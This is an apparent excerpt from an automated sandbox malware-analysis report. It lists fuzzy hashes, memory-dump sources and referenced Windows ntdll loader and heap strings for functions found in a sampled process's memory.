                                                  • Instruction ID: ffe1d9c46537387944b6faa69d1542197f62e6e3bc161f7693d4d126dedd6f26
                                                  • Opcode Fuzzy Hash: 92453194192f91625c36574a726f3d410036a67008c315c242eb6b75b64f3c4e
                                                  • Instruction Fuzzy Hash: 9D616172941239AFDB31DF55DC88BEAB7B8AF04714F0111E5A608A7291D774BE80CF90
                                                  Strings
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0436E6C6
                                                  • HEAP: , xrefs: 0436E6B3
                                                  • HEAP[%wZ]: , xrefs: 0436E6A6
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: 03a6aedd94380b002821017c4621bfe0961277563599c8ba6ff0b3e47f588412
                                                  • Instruction ID: 6f1061beff91755ab1a12ffe609f61fac5ae68c01d89b2fe7e752fd214dc2db0
                                                  • Opcode Fuzzy Hash: 03a6aedd94380b002821017c4621bfe0961277563599c8ba6ff0b3e47f588412
                                                  • Instruction Fuzzy Hash: 7F51F435704A45EFE732DBA8C955BA6BBF8EF05304F04A1A4E5428B6D2E7B4F944CB10
                                                  Strings
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 0437A59A
                                                  • LdrpCompleteMapModule, xrefs: 0437A590
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 0437A589
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 5f3ef0d00000c55fb7f06ca09c2678503eb3bd751a1054e575e7fe9654bf7741
                                                  • Instruction ID: ce70c7458abe676079d26ad7d02997488c4dd3b86eecca00ca30a09c91b836cf
                                                  • Opcode Fuzzy Hash: 5f3ef0d00000c55fb7f06ca09c2678503eb3bd751a1054e575e7fe9654bf7741
                                                  • Instruction Fuzzy Hash: 4551F230704B459BFB21DFA8C944B2AB7E8AF00725F182168ED919B6E1D778FD40CB40
                                                  Strings
                                                  • Failed to reallocate the system dirs string !, xrefs: 043882D7
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 043882E8
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 043882DE
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1783798831
                                                  • Opcode ID: 581958830aa9de38860e340289999cd946042b40b6d37e604561dc3380739882
                                                  • Instruction ID: 19e90c73ef5c3118bedc23fff6e0458056ab0bafcc1667106e08714e13a5668f
                                                  • Opcode Fuzzy Hash: 581958830aa9de38860e340289999cd946042b40b6d37e604561dc3380739882
                                                  • Instruction Fuzzy Hash: 614122B1651300ABE720EB64DE40B9BBBE8EF85754F01692AB945D3290E774FC50CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: d1eae5e011667dfe7dd743af08ea4322ceb2c03a739380e3bef597e5b49f7735
                                                  • Instruction ID: 8dfdadf4799a8669e382d8033d1171739aaec5d0923ef83f36958c2d79747dd7
                                                  • Opcode Fuzzy Hash: d1eae5e011667dfe7dd743af08ea4322ceb2c03a739380e3bef597e5b49f7735
                                                  • Instruction Fuzzy Hash: 054104703006858FEB24EE5CC8A47BA77A49F02304F18E5ADD4479F68AD774F885CB52
                                                  Strings
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 04381B39
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 04381B4A
                                                  • LdrpAllocateTls, xrefs: 04381B40
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 34050967b60cd48759e8968ef511499362ecfa52d1684f0c86069229cb16ff3d
                                                  • Instruction ID: 5469300a9528c8d82caf7b19c36c67eb6b1809198728b74d8e22d2f5884e28b0
                                                  • Opcode Fuzzy Hash: 34050967b60cd48759e8968ef511499362ecfa52d1684f0c86069229cb16ff3d
                                                  • Instruction Fuzzy Hash: EC419D75A00608AFEB15DFA8C941BAEFBF5FF88714F149119E805A7650E778B850CF90
                                                  Strings
                                                  • @, xrefs: 043CC1F1
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 043CC1C5
                                                  • PreferredUILanguages, xrefs: 043CC212
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                  • API String ID: 0-2968386058
                                                  • Opcode ID: e94cb6f8b133b69ba145f77bc7966b2f7be9a0ec9f78b8d4d6278ee88c39418e
                                                  • Instruction ID: 3f38fc698578e54bd5d757a444bb1dc86bcb67ed2f900c4d860df44933d59c8b
                                                  • Opcode Fuzzy Hash: e94cb6f8b133b69ba145f77bc7966b2f7be9a0ec9f78b8d4d6278ee88c39418e
                                                  • Instruction Fuzzy Hash: E4414171E10219ABEF11DED4C851FEEB7B8AF14704F14616AE909A7290DB74BE44CB50
                                                  Strings
                                                  • LdrpCheckRedirection, xrefs: 0439488F
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 04394899
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 04394888
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-3154609507
                                                  • Opcode ID: 0f16890755074e6ab28549f1e6569a5cae4e2a447d1ce1ef0c4cf67cb3d07a4c
                                                  • Instruction ID: 1e07cc02b470e937a8903773da886cbf91719b68348f2c51bb21a687e8c8095a
                                                  • Opcode Fuzzy Hash: 0f16890755074e6ab28549f1e6569a5cae4e2a447d1ce1ef0c4cf67cb3d07a4c
                                                  • Instruction Fuzzy Hash: 8741EE32B1C6519BCF20CE69D940A26BBE8EFA9B54B061569EC59D7211E331FC12CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  • Opcode ID: 7c0e19c82abd145c4ea7ea1d3e07cb53aefd508539d5e72e3b35590fdfd7b464
                                                  • Instruction ID: 9613141982d59f7e3323da8f3dec15ec3519bfd192e09cdab225654089f93ca1
                                                  • Opcode Fuzzy Hash: 7c0e19c82abd145c4ea7ea1d3e07cb53aefd508539d5e72e3b35590fdfd7b464
                                                  • Instruction Fuzzy Hash: 3B414531A447688BEB21DFE4C944BADB7B8FF65348F14146AD802EB781E7B4B911CB10
                                                  Strings
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0439B632
                                                  • @, xrefs: 0439B670
                                                  • GlobalFlag, xrefs: 0439B68F
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: 5b0e7c566b40bfc854140fb30f113f3fd42d0ef3e4cf699efd71909b7c93ff6a
                                                  • Instruction ID: a9866fb5552f62dd1e3400a52f5754809edb0d8de55c02284fdb9ae505efb4cc
                                                  • Opcode Fuzzy Hash: 5b0e7c566b40bfc854140fb30f113f3fd42d0ef3e4cf699efd71909b7c93ff6a
                                                  • Instruction Fuzzy Hash: 113109B1E00219AEEB10EF95DD81AEFBBB8EF44744F141469EA05A6150D774BE408BA4
                                                  Strings
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 04381A51
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 04381A40
                                                  • LdrpInitializeTls, xrefs: 04381A47
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 299f65c1a8b272cbfeb8a70af9aaa6122599b28395fd753a03c32139b73425f9
                                                  • Instruction ID: 8419cfe57c489af98ed629ae3bb74002c1322f48625ae372ce815c684bb5dc8d
                                                  • Opcode Fuzzy Hash: 299f65c1a8b272cbfeb8a70af9aaa6122599b28395fd753a03c32139b73425f9
                                                  • Instruction Fuzzy Hash: 1631B071A10A00BBFF10DF54CD49FAAB6E9EF80758F04512AE905A7590E778FD908BA0
                                                  Strings
                                                  • LdrpInitializationFailure, xrefs: 043920FA
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 04392104
                                                  • Process initialization failed with status 0x%08lx, xrefs: 043920F3
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2986994758
                                                  • Opcode ID: 9b6764341de640c98200288410533de8f25a3635708ff47929e35ad88263f7e0
                                                  • Instruction ID: 2f6ab23e2cd7c11b6704d3ba12b009199ab5a59792070961419446c8bf76a28c
                                                  • Opcode Fuzzy Hash: 9b6764341de640c98200288410533de8f25a3635708ff47929e35ad88263f7e0
                                                  • Instruction Fuzzy Hash: 49F0C831750308BFFB14EA49CD43FA677A8EB41B58F9004A9FB0077681D2B4BD50CA91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: a0b821f1c7b242108f986c1dd1ea99e8355fc245054b25913f05bc4f7968473b
                                                  • Instruction ID: bc00e6d42defee723b68872f55e8ea177b0f6ee968c95c733e4b6f185352866f
                                                  • Opcode Fuzzy Hash: a0b821f1c7b242108f986c1dd1ea99e8355fc245054b25913f05bc4f7968473b
                                                  • Instruction Fuzzy Hash: E0615B71E007199FEB24EFA88941BAEFBB9FF44704F50502DE949EB291E731A900CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$$
                                                  • API String ID: 0-233714265
                                                  • Opcode ID: 223e517c9fecac8659d351029cbc22ee0389c41e303fbb2907b494318f2382f8
                                                  • Instruction ID: 710692f9c5a65e75dd27329ad0374662142f52c368514008cf3f7b010fdac6e5
                                                  • Opcode Fuzzy Hash: 223e517c9fecac8659d351029cbc22ee0389c41e303fbb2907b494318f2382f8
                                                  • Instruction Fuzzy Hash: 3261CF71A00B59DFEB20DFA4C680BADF7B1FF44708F106029D515AB680DB78B941EB90
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0431063D
                                                  • kLsE, xrefs: 04310540
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 0-2547482624
                                                  • Opcode ID: c1585f2f69185644437019eeada2baed755ec36e412b67f2cc408489b10bbb7f
                                                  • Instruction ID: 2c6c6bbb544f177f0df815eb7071f8374271809b3f580215eb4c5fb0c6c593e4
                                                  • Opcode Fuzzy Hash: c1585f2f69185644437019eeada2baed755ec36e412b67f2cc408489b10bbb7f
                                                  • Instruction Fuzzy Hash: 3451AD716047429BE72CEF64C5406A7B7F4EF85304F00683EE9AA87A60E770B985CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: c7921cd560ff8781709638f55dc73d7930f972f6ebcb3cbae4b9a7c1b9485174
                                                  • Instruction ID: ad6c2b90e5a41346e838f4eb533107b1a76def023d8de21875a401d46fa9760d
                                                  • Opcode Fuzzy Hash: c7921cd560ff8781709638f55dc73d7930f972f6ebcb3cbae4b9a7c1b9485174
                                                  • Instruction Fuzzy Hash: 6631DE312487419BE311DF68D984B2AB7E4EF84758F082869FC54CB3E1EB34E915CB92
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 04382A95
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 04382A90
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: 5150b93ee8def02de38473846044d14fdf6eb02a8393fe69cdea2dadd20d3490
                                                  • Instruction ID: b12bf2f29999de117ecb26af2f368eead50bc917cbabf1313c259cb701ff7abd
                                                  • Opcode Fuzzy Hash: 5150b93ee8def02de38473846044d14fdf6eb02a8393fe69cdea2dadd20d3490
                                                  • Instruction Fuzzy Hash: 5611EC71700214BBF7259A888D41FFBB6ED9FD4B54F2590697D04DB380E674FD009690
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  • Opcode ID: 464ac0035b4e9a10d60e7a1b546033579ece906403ce69cb3579058745a624b0
                                                  • Instruction ID: b31bc6663bc65426ad132820c95779dd6695c4684b73c406575718bbbdd53ab7
                                                  • Opcode Fuzzy Hash: 464ac0035b4e9a10d60e7a1b546033579ece906403ce69cb3579058745a624b0
                                                  • Instruction Fuzzy Hash: 3C01F4B22A0700AFF351EF14CE45F6677E8EB84719F018939A658C7190E778F854CB4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  • Opcode ID: 4a05e9a12418a223dfa1f008add2bc5a02ca0467ab33753085425b2f149e5696
                                                  • Instruction ID: ad63eb73c174c09fc647dd4757987e3397633ed1b17f66fbabd1ad64c4bddac3
                                                  • Opcode Fuzzy Hash: 4a05e9a12418a223dfa1f008add2bc5a02ca0467ab33753085425b2f149e5696
                                                  • Instruction Fuzzy Hash: AC825D75E402589FDB28CFA9C880BADB7B5BF49310F14A169D859AB760EB30BD41CF50
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a275e35e7d72d7177da8089caabe91e85e95c4f36a33e32b89b14cfdb032f0b1
                                                  • Instruction ID: 901fea2ee3845d65fb2ea0b83d4f8937939dc181493672517aef7516e7796e5e
                                                  • Opcode Fuzzy Hash: a275e35e7d72d7177da8089caabe91e85e95c4f36a33e32b89b14cfdb032f0b1
                                                  • Instruction Fuzzy Hash: 47415A75D01288AFEB20CFA9C480AEEBBF4FF48304F54816EE859A7211D734A950CF60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: f591eb9fefaa96f0350d2e03bc7c65e89aed4ad9d6e264a6f498e44b3a378ca7
                                                  • Instruction ID: 9068dc40ea95c445c92f0ac6cbe69fa52dd12a8cdaab582ae23ae9bc68be34d3
                                                  • Opcode Fuzzy Hash: f591eb9fefaa96f0350d2e03bc7c65e89aed4ad9d6e264a6f498e44b3a378ca7
                                                  • Instruction Fuzzy Hash: C1914D72A41619AFEB21DF95CD85FAEB7B8EF08B54F105065FA00AB190D774BD04CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  • Opcode ID: dfbc5cc37951ebc0a03ce542150b2106f3346449f85d70f92ac7f2c662d4a663
                                                  • Instruction ID: 651d058fce0829874b1bbd0b3fd272aab24bfb40f81e7d40ec937b7803f0d10e
                                                  • Opcode Fuzzy Hash: dfbc5cc37951ebc0a03ce542150b2106f3346449f85d70f92ac7f2c662d4a663
                                                  • Instruction Fuzzy Hash: EC716C75E0031A9FDF28EF98D5917ADFBB1BF88704F14912EE406AB240E735A941CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction ID: ff109fe23461437e34c2d00d1f365515835318e4f92432ec2fe0108e2f8a8253
                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction Fuzzy Hash: 57615AB1D00219AFDF25DFA5C850BEEBBB8FF84714F145169E810A72A0D775AA01DFA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
